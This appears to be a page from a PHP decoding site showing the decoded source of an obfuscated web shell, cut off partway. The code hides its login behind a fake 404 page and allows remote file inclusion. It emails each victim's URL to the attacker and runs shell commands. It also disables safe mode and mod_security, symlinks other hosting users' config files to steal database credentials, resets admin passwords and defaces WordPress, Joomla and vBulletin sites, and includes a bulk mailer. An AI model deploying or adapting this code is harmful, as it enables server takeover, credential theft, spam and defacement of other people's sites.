Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$X= 'LyogLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tL..
Decoded Output download
$auth_pass = "42ebd0ccd2a17aa98fe2aaf21f74c827";
if (trim($_GET['x']) != '') {
@include ($_GET['x']);
exit();
}
$email = '[email protected]';
$y = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
@mail($email, 'Exploit: ' . $_SERVER['PHP_SELF'], 'Hey , this is a new victim\'s exploit: ' . $y . '
You can use (x=shell_url) at the end of the link ;) ', 'From: ' . $email . ' <' . $email . '>
');
$color = "#00ff00";
$default_action = 'FilesMan';
@define('SELF_PATH', '__FILE__');
if (strpos($_SERVER['HTTP_USER_AGENT'], 'Google') !== false) {
if ($action == "send") {
if (!$from && !$subject && !$message && !$emaillist) {
print "Please complete all fields before sending your message.";
exit;
}
$allemails = split("
", $emaillist);
$numemails = count($allemails);
$filter = "maillist";
$float = "From : mailist info <[email protected]>";
//Open the file attachment if any, and base64_encode it for email transport
If ($file_name) {
if (!file_exists($file)) {
die("The file you are trying to upload couldn't be copied to the server");
}
$content = fread(fopen($file, "r"), filesize($file));
$content = chunk_split(base64_encode($content));
$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);
}
for ($xx = 0;$xx < $amount;$xx++) {
for ($x = 0;$x < $numemails;$x++) {
$to = $allemails[$x];
if ($to) {
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print "Sending mail to $to.......";
flush();
$header = "From: $realname <$from>
Reply-To: $replyto
";
$header.= "MIME-Version: 1.0
";
If ($file_name) $header.= "Content-Type: multipart/mixed; boundary=$uid
";
If ($file_name) $header.= "--$uid
";
$header.= "Content-Type: text/$contenttype
";
$header.= "Content-Transfer-Encoding: 8bit
";
$header.= "$message
";
If ($file_name) $header.= "--$uid
";
If ($file_name) $header.= "Content-Type: $file_type; name=\"$file_name\"
";
If ($file_name) $header.= "Content-Transfer-Encoding: base64
";
If ($file_name) $header.= "Content-Disposition: attachment; filename=\"$file_name\"
";
If ($file_name) $header.= "$content
";
If ($file_name) $header.= "--$uid--";
mail($to, $subject, "", $header);
print "ok<br>";
flush();
}
}
}
}
if (trim($_GET['x']) != '') {
@include ($_GET['x']);
exit();
}
$email = '[email protected]';
$y = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
@mail($email, 'Exploit: ' . $_SERVER['PHP_SELF'], 'Hey , this is a new victim\'s exploit: ' . $y . '
You can use (x=shell_url) at the end of the link ;) ', 'From: ' . $email . ' <' . $email . '>
');
header('HTTP/1.0 404 Not Found');
exit;
}
@session_start();
@error_reporting(0);
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '2.1');
if (get_magic_quotes_gpc()) {
function stripslashes_array($array) {
return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
}
$_POST = stripslashes_array($_POST);
}
function printLogin() {;
echo '
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at ';
echo $_SERVER['HTTP_HOST'];
echo ' Port 80</address>
<style>
input { margin:0;background-color:#fff;border:1px solid #fff; }
</style>
<center>
<form method=post>
<input type=password name=pass>
</form></center>
';
exit;
}
if (!isset($_SESSION[md5($_SERVER['HTTP_HOST']) ])) if (empty($auth_pass) || (isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))) $_SESSION[md5($_SERVER['HTTP_HOST']) ] = true;
else printLogin();
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
$enable_wp = true;
$enable_joomla = true;
$enable_vb = false;
$enable_phpbb = false;
$enable_ipb = false;
if (isset($_SESSION['safechk'])) {
if (ini_get('safe_mode') or ini_get('disable_functions') or !ini_get('allow_url_fopen')) {
$byphp = "safe_mode = Off
disable_functions =
safe_mode_gid = OFF
open_basedir = OFF
allow_url_fopen = On";
$byht = "<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckUnicodeEncoding Off
</IfModule>";
file_put_contents("php.ini", $byphp);
file_put_contents(".htaccess", $byht);
$_SESSION['safechk'] = "done";
die("PHP Safe Mode ByPassed. Please Refresh This page");
}
}
function convertByte($s) {
if ($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824) . ' GB';
elseif ($s >= 1048576) return sprintf('%1.2f', $s / 1048576) . ' MB';
elseif ($s >= 1024) return sprintf('%1.2f', $s / 1024) . ' KB';
else return $s . ' B';
}
function curPageURL() {
$pageURL = 'http';
if ($_SERVER["HTTPS"] == "on") {
$pageURL.= "s";
}
$pageURL.= "://";
if ($_SERVER["SERVER_PORT"] != "80") {
$pageURL.= $_SERVER["SERVER_NAME"] . ":" . $_SERVER["SERVER_PORT"] . $_SERVER["REQUEST_URI"];
} else {
$pageURL.= $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"];
}
return $pageURL;
}
function chkDis($link, $str) {
$lol = get_headers($link, 1);
if (strpos($lol[0], "200")) {
$nan = file_get_contents($link);
if (strpos($nan, $str)) {
return true;
} else {
return false;
}
} else {
return false;
}
}
function getDnamed() {
if (is_readable("/var/named")) {
$list = scandir("/var/named");
foreach ($list as $domain) {
if (strpos($domain, ".db")) {
$i+= 1;
$domain = str_replace('.db', '', $domain);
$owner = posix_getpwuid(fileowner("/etc/valiases/" . $domain));
$dn[$owner['name']] = $domain;
}
}
}
return $dn;
}
function chkSys($link) {
$sys_arr = array("WordPress" => array("l" => "wp-config.php", "s" => "WordPress"), "Joomla" => array("l" => "configuration.php", "s" => "JConfig"),);
foreach ($sys_arr as $k => $dan) {
if (chkDis($link . $dan['l'], $dan['s'])) {
return array('link' => $link . $dan['l'], 'cms' => $k);
}
}
}
function EloFind($str, $start, $end) {
$len = strlen($str);
$start_pos = (strpos($str, $start) + strlen($start));
$str = substr($str, $start_pos);
$end_pos = strpos($str, $end);
$str = substr($str, 0, $end_pos);
return $str;
}
function GetPage($url, $cookie, $post = null, $head = true) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, $head);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
If ($post != NULL) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
}
$urlPage = curl_exec($ch);
if (curl_errno($ch)) {
echo curl_error($ch);
}
curl_close($ch);
return ($urlPage);
}
function throwErr($str) {
$arr = array("status" => "error", "msg" => $str);
die(json_encode($arr));
}
function add2file($file, $str) {
if (file_exists($file)) {
$do = file_get_contents($file);
if (!strpos($do, $str)) {
file_put_contents($file, $str, FILE_APPEND);
}
} else {
file_put_contents($file, $str, FILE_APPEND);
}
}
function doXploitWP($cnf, $html, $npass) {
$success = false;
$str = file_get_contents($cnf);
if (preg_match('%DB_USER%', $str)) {
$username = EloFind($str, "define('DB_USER', '", "');");
$password = EloFind($str, "define('DB_PASSWORD', '", "');");
$dbname = EloFind($str, "define('DB_NAME', '", "');");
$prefix = EloFind($str, "table_prefix = '", "'");
$link = mysql_connect("localhost", $username, $password);
if ($link) {
mysql_select_db($dbname, $link);
$req1 = mysql_query("UPDATE `" . $prefix . "users` SET `user_login` = 'admin',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.' WHERE `ID` =1 LIMIT 1 ;");
$req = mysql_query("SELECT * from `" . $prefix . "options` WHERE option_name='home'");
$data = mysql_fetch_array($req);
$site_url = $data["option_value"];
} else {
throwErr("Mysql Fail");
}
$status['site'] = $site_url;
$cookie = 'cookie/' . md5($cnf) . '.txt';
@unlink($cookie);
$logged_in = true;
$url = $site_url . "/wp-login.php";
$postme = 'log=admin&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1';
$logme = GetPage($url, $cookie, $postme);
if (!preg_match('%logout%', $logme)) {
file_put_contents("login.txt", $site_url . $logme);
throwErr("Login Error");
}
if ($logged_in) {
$url = $site_url . "/wp-admin/theme-editor.php";
$themeditor = GetPage($url, $cookie, null);
$nola = explode(Chr(10), $themeditor);
foreach ($nola as $nline) {
if (preg_match('%theme-editor\.php\?file=%', $nline) && preg_match('%\((index\.php|home\.php|404\.php|archive\.php|comment\.php)\)%', strtolower($nline))) {
$modify[EloFind($nline, '(', ')') ] = EloFind($nline, '<a href="', '"');
}
}
if (is_array($modify)) {
foreach ($modify as $met => $indfile) {
$nri = str_replace('.', '_', $met);
$nri = "n" . $nri;
if ($_POST[$nri] == "on" && (!$success OR $met == "index.php")) {
$indfile = str_replace("&", "&", $indfile);
$url = trim($site_url . "/wp-admin/" . $indfile);
$themepage = GetPage($url, $cookie, "");
$_wpnonce = EloFind($themepage, 'name="_wpnonce" value="', '"');
$_file = EloFind($themepage, 'name="file" value="', '"');
$nfile = explode('themes', $_file);
$jfile = $site_url . "/wp-content/themes" . end($nfile);
$url = $site_url . "/wp-admin/theme-editor.php";
$postme = "newcontent=" . urlencode($html) . "&action=update&file=" . $_file . "&_wpnonce=" . $_wpnonce . "&submit=Update File";
$themedied = GetPage($url, $cookie, $postme);
if (preg_match('%<div id=\"message\" class=\"updated\">%', $themedied)) {
if (!$success) {
add2file("wp_site.txt", $jfile . Chr(10));
}
$success = true;
if ($met == "index.php") {
add2file("wp_index.txt", $site_url . Chr(10));
}
} else {
$error = true;
}
}
}
} else {
throwErr("No file found");
}
if ($success) {
$url = trim($site_url . "/wp-admin/profile.php");
$themepage = GetPage($url, $cookie, "");
$_wpnonce = EloFind($themepage, 'name="_wpnonce" value="', '"');
$url = trim($site_url . "/wp-admin/profile.php");
$postme = "_wpnonce=" . $_wpnonce . "&_wp_http_referer=%2Fwp-admin%2Fprofile.php%3Fupdated%3Dtrue&from=profile&checkuser_id=1&admin_color=fresh&admin_bar_front=1&first_name=&last_name=&nickname=admin&display_name=BdBlackHat&[email protected]&url=&aim=&yim=&jabber=&description=&pass1=" . $npass . "&pass2=" . $npass . "&action=update&user_id=1&submit=Update+Profile";
$themepage = GetPage($url, $cookie, $postme);
$status['status'] = "success";
die(json_encode($status));
} else {
if ($error) {
throwErr("Could't Update the file");
} else {
throwErr("Selected file not found");
}
}
}
} else {
throwErr("Config not found");
}
return true;
}
function doXploitJM($cnf, $html, $npass) {
function joomlaCom($site_url, $cookie, $site) {
if ($_POST['com_install'] == "on") {
$url = $site_url . "/index.php?option=com_installer";
$compage = GetPage($url, $cookie);
preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%', $compage, $dhash);
$hash = $dhash[1];
preg_match_all('#value="/(.*?)"#s', $compage, $path);
foreach ($path[0] as $pathx) {
$pathx = ereg_replace('value="', '', $pathx);
$pathx = ereg_replace('"', '', $pathx);
}
$dir = getcwd() . "/team152.html";
$postme = array("install_package" => "@" . $dir, "install_directory" => "" . $pathx . "", "install_url" => "http://", "type" => "", "installtype" => "upload", "task" => "doInstall", "option" => "com_installer", "" . $hash . "" => "1");
$url = $site_url . "/index.php?option=com_installer";
$com_shell = GetPage($url, $cookie, $postme);
if (preg_match('#<li>Unknown Archive Type</li>#s', $com_shell)) {
add2file("jm_site.txt", $site . "/tmp/team152.html" . Chr(10));
$status['site'] = $site . "/tmp/team152.html";
$status['status'] = "success";
die(json_encode($status));
} else {
return false;
}
}
return true;
}
$str = file_get_contents($cnf);
if (preg_match('%(JConfig|mosConfig)%', $str)) {
if (preg_match('%JConfig%', $str)) {
$username = EloFind($str, "\$user = '", "'");
$password = EloFind($str, "\$password = '", "'");
$dbname = EloFind($str, "\$db = '", "'");
$prefix = EloFind($str, "\$dbprefix = '", "'");
$pwd = md5($npass);
if ($_POST['domain'] != "...") {
$site_url = $_POST['domain'];
$site_url = "http://" . $site_url;
} else {
$mailto = EloFind($str, "\$mailfrom = '", "'");
$siteul = explode('@', $mailto);
$site_url = "http://" . $siteul[1];
}
} elseif (preg_match('%mosConfig%', $str)) {
$username = EloFind($str, "\$mosConfig_user = '", "'");
$password = EloFind($str, "\$mosConfig_password = '", "'");
$dbname = EloFind($str, "\$mosConfig_db = '", "'");
$prefix = EloFind($str, "\$mosConfig_dbprefix = '", "'");
$pwd = md5($npass);
if ($_POST['domain'] != "...") {
$site_url = $_POST['domain'];
$site_url = "http://" . $site_url;
} else {
$mailto = EloFind($str, "\$mosConfig_mailfrom = '", "'");
$siteul = explode('@', $mailto);
$site_url = "http://" . $siteul[1];
}
}
$site = $site_url;
$site_url = $site_url . "/administrator/";
$cookie = 'cookie/' . md5($cnf) . '.txt';
@unlink($cookie);
$link = mysql_connect("localhost", $username, $password);
if ($link) {
mysql_select_db($dbname, $link);
$changepass = mysql_query("UPDATE " . $prefix . "users SET username ='admin' , block ='0' , password = '" . $pwd . "'");
$doit = mysql_query("SELECT * from `" . $prefix . "extensions` ");
if ($doit) {
if ($_POST['ignore_def'] == "on") {
$req = mysql_query("SELECT * from `" . $prefix . "template_styles` WHERE client_id='0' and home='0'");
$data = mysql_fetch_array($req);
$template_name = $data["template"];
if (strlen($template_name) < 1) {
$req = mysql_query("SELECT * from `" . $prefix . "template_styles` WHERE client_id='0' and home='1'");
$data = mysql_fetch_array($req);
$template_name = $data["template"];
}
} else {
$req = mysql_query("SELECT * from `" . $prefix . "template_styles` WHERE client_id='0' and home='1'");
$data = mysql_fetch_array($req);
$template_name = $data["template"];
}
$req = mysql_query("SELECT * from `" . $prefix . "extensions` WHERE name='" . $template_name . "'");
$data = mysql_fetch_array($req);
$template_id = $data["extension_id"];
$url = $site_url . "index.php";
$login_page = GetPage($url, $cookie);
$rhash = EloFind($login_page, 'type="hidden" name="return" value="', '"');
preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%', $login_page, $dhash);
$hash = $dhash[1];
$url = $site_url . "index.php";
$postme = "username=admin&passwd=" . $npass . "&usrname=admin&pass=" . $npass . "&submit=Login&option=com_login&lang=en-GB&task=login&return=" . $rhash . "&" . $hash . "=1";
$logginin = GetPage($url, $cookie, $postme);
if (preg_match('%logout|index2\.php%', $logginin)) {
$logged_in = true;
}
if (!$logged_in) {
file_put_contents("jm_login1.6" . md5($site_url) . ".txt", $site_url . $logginin);
throwErr("Login Error");
}
if ($logged_in) {
joomlaCom($site_url, $cookie, $site);
$url = $site_url . "/index.php?option=com_templates&task=source.edit&id=" . base64_encode($template_id . ":index.php");
$themepage = GetPage($url, $cookie);
if (preg_match('%type=\"hidden\" name=\"\w+\" value=\"1\"%', $themepage)) {
preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%', $themepage, $dhash);
$hash = $dhash[1];
$url = $site_url . "/index.php?option=com_templates&layout=edit";
$postme = "jform[source]=" . urlencode($html) . "&jform[filename]=index.php&jform[extension_id]=" . $template_id . "&" . $hash . "=1&task=source.save";
$themeedit = GetPage($url, $cookie, $postme);
if (preg_match('%class=\"message message\"%', $themeedit)) {
add2file("jm_site.txt", $site . "/templates/" . $template_name . "/index.php" . Chr(10));
add2file("jm_index.txt", $site . Chr(10));
if ($_POST['ignore_def'] == "on") {
$status['site'] = $site . "/templates/" . $template_name . "/index.php";
} else {
$status['site'] = $site;
}
$status['status'] = "success";
die(json_encode($status));
} else {
throwErr("Update failed");
}
} else {
throwErr("Index not found");
}
}
} else {
$req = mysql_query("SELECT * from `" . $prefix . "templates_menu` WHERE client_id='0'");
$data = mysql_fetch_array($req);
$template_name = $data["template"];
$url = $site_url . "index.php";
$login_page = GetPage($url, $cookie);
preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%', $login_page, $dhash);
$hash = $dhash[1];
$postme = "username=admin&passwd=" . $npass . "&usrname=admin&lang=en-GB&pass=" . $npass . "&submit=Login&option=com_login&task=login&" . $hash . "=1";
$url = $site_url . "index.php";
$logginin = GetPage($url, $cookie, $postme);
if (preg_match('%logout|index2\.php%', $logginin)) {
$logged_in = true;
}
if (!$logged_in) {
file_put_contents("jm_login1.5" . md5($site_url) . ".txt", $site_url . $logginin);
throwErr("Login Error");
}
if ($logged_in) {
joomlaCom($site_url, $cookie, $site);
if (preg_match('%index2\.php%', $logginin)) {
$url = $site_url . "index2.php";
$logginin = GetPage($url, $cookie);
preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%', $logginin, $dhash);
$hash = $dhash[1];
$url = $site_url . "/index2.php";
$postme = "doPreview=on&cid%5B%5D=" . $template_name . "&limit=30&limitstart=0&option=com_templates&task=edit_source&boxchecked=1&hidemainmenu=1&client=0&" . $hash . "=1";
$themepage = GetPage($url, $cookie, $postme);
if (preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%', $themepage)) {
preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%', $themepage, $dhash);
$hash = $dhash[1];
$url = $site_url . "/index2.php";
$postme = "filecontent=" . urlencode($html) . "&template=" . $template_name . "&option=com_templates&task=save_source&client=0&" . $hash . "=1";
$themeedit = GetPage($url, $cookie, $postme);
if (preg_match('%Template Manager%', $themeedit)) {
add2file("jm_site.txt", $site . "/templates/" . $template_name . "/index.php" . Chr(10));
add2file("jm_index.txt", $site . Chr(10));
$status['site'] = $site;
$status['status'] = "success";
die(json_encode($status));
} else {
file_put_contents("jmupd.txt", $site_url . $themeedit);
throwErr($template_name);
}
} else {
throwErr("Index not found");
}
} else {
preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%', $logginin, $dhash);
$hash = $dhash[1];
$url = $site_url . "/index.php?option=com_templates&task=edit_source&client=0&id=" . $template_name . "&" . $hash . "=1";
$themepage = GetPage($url, $cookie);
if (preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%', $themepage)) {
preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%', $themepage, $dhash);
$hash = $dhash[1];
$url = $site_url . "/index.php?option=com_templates&layout=edit";
$postme = "filecontent=" . urlencode($html) . "&id=" . $template_name . "&cid[]=" . $template_name . "&" . $hash . "=1&task=save_source&client=0";
$themeedit = GetPage($url, $cookie, $postme);
if (preg_match('%class=\"message message fade\"%', $themeedit)) {
add2file("jm_site.txt", $site . "/templates/" . $template_name . "/index.php" . Chr(10));
add2file("jm_index.txt", $site . Chr(10));
$status['site'] = $site;
$status['status'] = "success";
die(json_encode($status));
} else {
file_put_contents("jmupd.txt", $site_url . $themeedit);
throwErr($template_name);
}
} else {
throwErr("Index not found");
}
}
}
}
} else {
throwErr("Mysql Fail");
}
} else {
throwErr("Config not found");
}
}
function doXploitVB($cnf, $html) {
$str = file_get_contents($cnf);
if (preg_match('%vBulletin%', $str)) {
$username = EloFind($str, "\$config['MasterServer']['username'] = '", "'");
$password = EloFind($str, "\$config['MasterServer']['password'] = '", "'");
$dbname = EloFind($str, "\$config['Database']['dbname'] = '", "'");
$prefix = EloFind($str, "\$config['Database']['tableprefix'] = '", "'");
$link = mysql_connect("localhost", $username, $password);
if ($link) {
mysql_select_db($dbname, $link);
$html = str_replace('"', '\"', $html);
$query = "UPDATE template SET template = '" . $html . "'";
$result = @mysql_query($query);
if ($result) {
$query = "SELECT * FROM `datastore` WHERE title = 'options'";
$result = @mysql_query($query);
$data = mysql_fetch_array($result);
$optionz = $data["data"];
$site_url = EloFind($optionz, '"bburl";s:34:"', '"');
$status['site'] = $site_url;
$status['status'] = "success";
die(json_encode($status));
} else {
throwErr("Update Failed");
}
} else {
throwErr("Mysql Fail");
}
} else {
throwErr("Config not found");
}
}
function exme($in) {
$out = '';
if (function_exists('exec')) {
@exec($in, $out);
$out = @join("</br>", $out);
} elseif (function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$out = shell_exec($in);
} elseif (is_resource($f = @popen($in, "r"))) {
$out = "";
while (!@feof($f)) $out.= fread($f, 1024);
pclose($f);
}
return $out;
}
if ($_POST['ac'] == "secinfo") {
if (is_readable("/etc/named.conf")) {
echo '» /etc/named.conf is readable.<br />';
} else {
echo '» <font color="red">/etc/named.conf not readable</font> <br />';
}
if (is_readable("/etc/passwd")) {
echo '» /etc/passwd is readable.<br />';
} else {
echo '» <font color="red">/etc/passwd not readable</font> <br />';
}
if (is_readable("/etc/valiases")) {
echo '» /etc/valiases exists';
if (is_array(scandir("/etc/valiases"))) {
echo ' & scanable';
}
echo '.<br />';
} else {
echo '» <font color="red">/etc/valiases not readable</font> <br />';
}
if (is_readable("/var/named")) {
echo '» /var/named exists';
if (is_array(scandir("/var/named"))) {
echo ' & scanable';
}
echo '.<br />';
} else {
echo '» <font color="red">/var/named not readable</font> <br />';
}
if (ini_get('disable_functions')) {
echo '» ' . ini_get('disable_functions') . ' are disabled<br />';
}
if (function_exists("symlink")) {
echo '» Symlinking allowed<br />';
} else {
echo '» <font color="red">Symlinking not allowed</font> <br />';
}
if (is_writable("/var/tmp")) {
echo '» /var/tmp folder is writable<br />';
}
if (is_readable('/var/log')) {
echo '» /var/log folder is readable<br />';
}
die();
} elseif ($_POST['ac'] == "sysinfo") {
echo "<span style='color:red;'><strong>System:</strong></span> " . php_uname() . "<br />";
echo "<span style='color:red;'><strong>WebServer:</strong></span> " . $_SERVER['SERVER_SOFTWARE'] . "<br />";
echo "<span style='color:red;'><strong>PHP version:</strong></span> " . phpversion() . " on " . php_sapi_name() . "<br />";
$ssys = "None";
if (is_dir("/usr/local/cpanel")) {
$ssys = "Running On Cpanel";
} elseif (is_dir("/usr/local/directadmin")) {
$ssys = "Running On Directadmin";
}
echo "<span style='color:red;'><strong>Server System:</strong></span> " . $ssys . "<br />";
if (function_exists("disk_total_space")) {
echo "<span style='color:red;'><strong>Free Disk:</strong></span> " . convertByte(disk_free_space("/")) . " / " . convertByte(disk_total_space("/")) . "<br />";
}
echo "<span style='color:red;'><strong>Server IP:</strong></span> " . $_SERVER["SERVER_ADDR"] . "<br />";
die();
} elseif ($_POST['ac'] == "browse") {
error_reporting(0);
if ($_POST['path'] != "") {
$path = $_POST['path'];
} else {
$path = getcwd();
}
$filez = scandir($path);
$q = 2;
foreach ($filez as $mfile) {
if ($q == 2) {
$q = 1;
} else {
$q = 2;
}
$npath = $_POST['path'] . $mfile;
$stat = stat($npath);
$usr = posix_getpwuid($stat['uid']);
$grp = posix_getpwuid($stat['gid']);
if (is_dir($npath)) {
$size = "Dir";
} else {
$size = convertByte($stat['size']);
}
$fperm = substr(sprintf('%o', fileperms($npath)), -4);
if (!$fperm) {
$fperm = "<font color='red'>Restricted</font>";
} elseif (is_writeable($npath)) {
$fperm = "<font color='#28FE14'>" . $fperm . "</font>";
} elseif (is_readable($npath)) {
$fperm = "<font color='yellow'>" . $fperm . "</font>";
}
echo '<div class="filetable">
<div class="tblbx' . $q . '" style="width:220px;text-align:left;"><a href="" onClick="filebrs(\'' . $npath . '/\'); return false;">' . $mfile . '</a></div>
<div class="tblbx' . $q . '" style="width:80px;">' . $size . '</div>
<div class="tblbx' . $q . '" style="width:100px;">Modify</div>
<div class="tblbx' . $q . '" style="width:100px;">' . $usr['name'] . "/" . $grp['name'] . '</div>
<div class="tblbx' . $q . '" style="width:100px;">' . $fperm . '</div>
<div class="tblbx' . $q . '" style="width:80px;">Action</div>
</div>';
}
die();
} elseif ($_POST['ac'] == "chknamed") {
error_reporting(0);
if (is_readable("/etc/named.conf")) {
$named = file_get_contents("/etc/named.conf");
preg_match_all('%zone \"(.*)\" {%', $named, $domains);
foreach ($domains[1] as $domain) {
$domain = trim($domain);
$i+= 1;
$owner = posix_getpwuid(fileowner("/etc/valiases/" . $domain));
$dn.= "<a href='http://" . $domain . "'>" . $domain . "</a> - " . $owner['name'] . "<br />";
}
echo "Total Domains Found: " . $i . "<br />" . $dn;
die();
} elseif (is_readable("/etc/valiases")) {
$list = scandir("/etc/valiases");
foreach ($list as $domain) {
$i+= 1;
$owner = posix_getpwuid(fileowner("/etc/valiases/" . $domain));
$dn.= "<a href='http://" . $domain . "'>" . $domain . "</a> - " . $owner['name'] . "<br />";
}
echo "Total Domains Found: " . $i . "<br />" . $dn;
die();
} elseif (is_readable("/var/named")) {
$list = scandir("/var/named");
foreach ($list as $domain) {
if (strpos($domain, ".db")) {
$i+= 1;
$domain = str_replace('.db', '', $domain);
$owner = posix_getpwuid(fileowner("/etc/valiases/" . $domain));
$dn.= "<a href='http://" . $domain . "'>" . $domain . "</a> - " . $owner['name'] . "<br />";
}
}
echo "Total Domains Found: " . $i . "<br />" . $dn;
die();
} else {
die("'/etc/named.conf' is not readable. Try scan for public_html. (:");
}
} elseif ($_POST['ac'] == "safebypass") {
$byphp = "safe_mode = Off
disable_functions =
safe_mode_gid = OFF
open_basedir = OFF
allow_url_fopen = On";
$byht = "<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckUnicodeEncoding Off
</IfModule>";
file_put_contents("php.ini", $byphp);
file_put_contents(".htaccess", $byht);
echo "<script>alert('Safe Mode ByPassed'); hideAll();</script>";
die();
} elseif ($_POST['ac'] == "chkph") {
if (is_readable("/etc/passwd")) {
if (!is_dir("team152")) {
@mkdir('team152', 0777);
}
$htaccss = "Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any";
file_put_contents("team152/.htaccess", $htaccss);
$etc = file_get_contents("/etc/passwd");
$etcz = explode("
", $etc);
foreach ($etcz as $etz) {
$etcc = explode(":", $etz);
error_reporting(0);
if ($enable_wp) {
symlink('/home/' . $etcc[0] . '/public_html/wp-config.php', "team152/" . $etcc[0] . '-WordPress.txt');
symlink('/home/' . $etcc[0] . '/public_html/blog/wp-config.php', "team152/" . $etcc[0] . '-WordPress.txt');
symlink('/home/' . $etcc[0] . '/public_html/wp/wp-config.php', "team152/" . $etcc[0] . '-WordPress.txt');
}
if ($enable_phpbb) {
symlink('/home/' . $etcc[0] . '/public_html/config.php', "team152/" . $etcc[0] . '-PhpBB.txt');
}
if ($enable_vb) {
symlink('/home/' . $etcc[0] . '/public_html/includes/config.php', "team152/" . $etcc[0] . '-vBulletin.txt');
}
if ($enable_joomla) {
symlink('/home/' . $etcc[0] . '/public_html/configuration.php', "team152/" . $etcc[0] . '-Joomla.txt');
symlink('/home/' . $etcc[0] . '/public_html/web/configuration.php', "team152/" . $etcc[0] . '-Joomla.txt');
symlink('/home/' . $etcc[0] . '/public_html/site/configuration.php', "team152/" . $etcc[0] . '-Joomla.txt');
}
}
$lol = explode("/", curPageURL());
$link = str_replace(end($lol), "", curPageURL());
$str = file_get_contents($link . "/team152");
preg_match_all('%\w \w{4}=(\"|\')(.*)\.txt(\"|\')%', $str, $exp);
if (is_array($exp[2])) {
$q = 2;
$dmn = getDnamed();
foreach ($exp[2] as $sitez) {
if ($q == 2) {
$q = 1;
} else {
$q = 2;
}
$j+= 1;
$sn = explode("-", $sitez);
$domain = $dmn[$sn[0]];
if ($domain) {
$domain = "<a id='inj_dom" . $j . "' href='http://" . $domain . "'>" . $domain . "</a>";
} else {
$domain = "<a id='inj_dom" . $j . "' href=''>...</a>";
}
$nan.= '<div id="inj' . $j . '">
<div class="tblbx' . $q . '" style="width:200px;cursor:pointer;background-color:#76BBEB;" id="injc' . $j . '"onClick="doToggle(\'' . $j . '\');">' . $sn[0] . '<input style="display:none;" type="checkbox" id="injchk' . $j . '" checked></div>
<div class="tblbx' . $q . '" style="width:220px;" id="inj_domain' . $j . '">' . $domain . '</div>
<div class="tblbx' . $q . '" style="width:160px;"><a id="injst' . $j . '" class="conf" href="' . $link . 'team152/' . $sitez . '.txt" title="' . $j . '">' . ucfirst($sn[1]) . '</a></div>
<div class="tblbx' . $q . '" style="width:120px;" id="inj_status' . $j . '" title="On Idle...">Idle...</div>
</div>';
}
$cnt = '<input type="text" style="display:none" id="sitecount" value="' . $j . '">';
echo $nan . $cnt;
}
}
die();
} elseif ($_POST['ac'] == "chkph2") {
if (is_readable("/etc/passwd")) {
if (!is_dir("team152")) {
@mkdir('team152', 0777);
}
if (!is_link("team152/root")) {
$sym = symlink("/", "team152/root");
if (!$sym) {
die("Symlink method failed.");
}
}
$htaccss = "Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any";
file_put_contents("team152/.htaccess", $htaccss);
$etc = file_get_contents("/etc/passwd");
$etcz = explode("
", $etc);
$lol = explode("/", curPageURL());
$link = str_replace(end($lol), "", curPageURL());
@unlink("rootinject.tmp");
$q = 2;
$dmn = getDnamed();
foreach ($etcz as $etz) {
$etcc = explode(":", $etz);
$dr = "team152/root/home/" . $etcc[0] . "/public_html/";
$dan = chkSys($link . $dr);
if ($dan) {
if ($q == 2) {
$q = 1;
} else {
$q = 2;
}
$domain = $dmn[$etcc[0]];
if ($domain) {
$domain = "<a id='inj_dom" . $k . "' href='http://" . $domain . "'>" . $domain . "</a>";
} else {
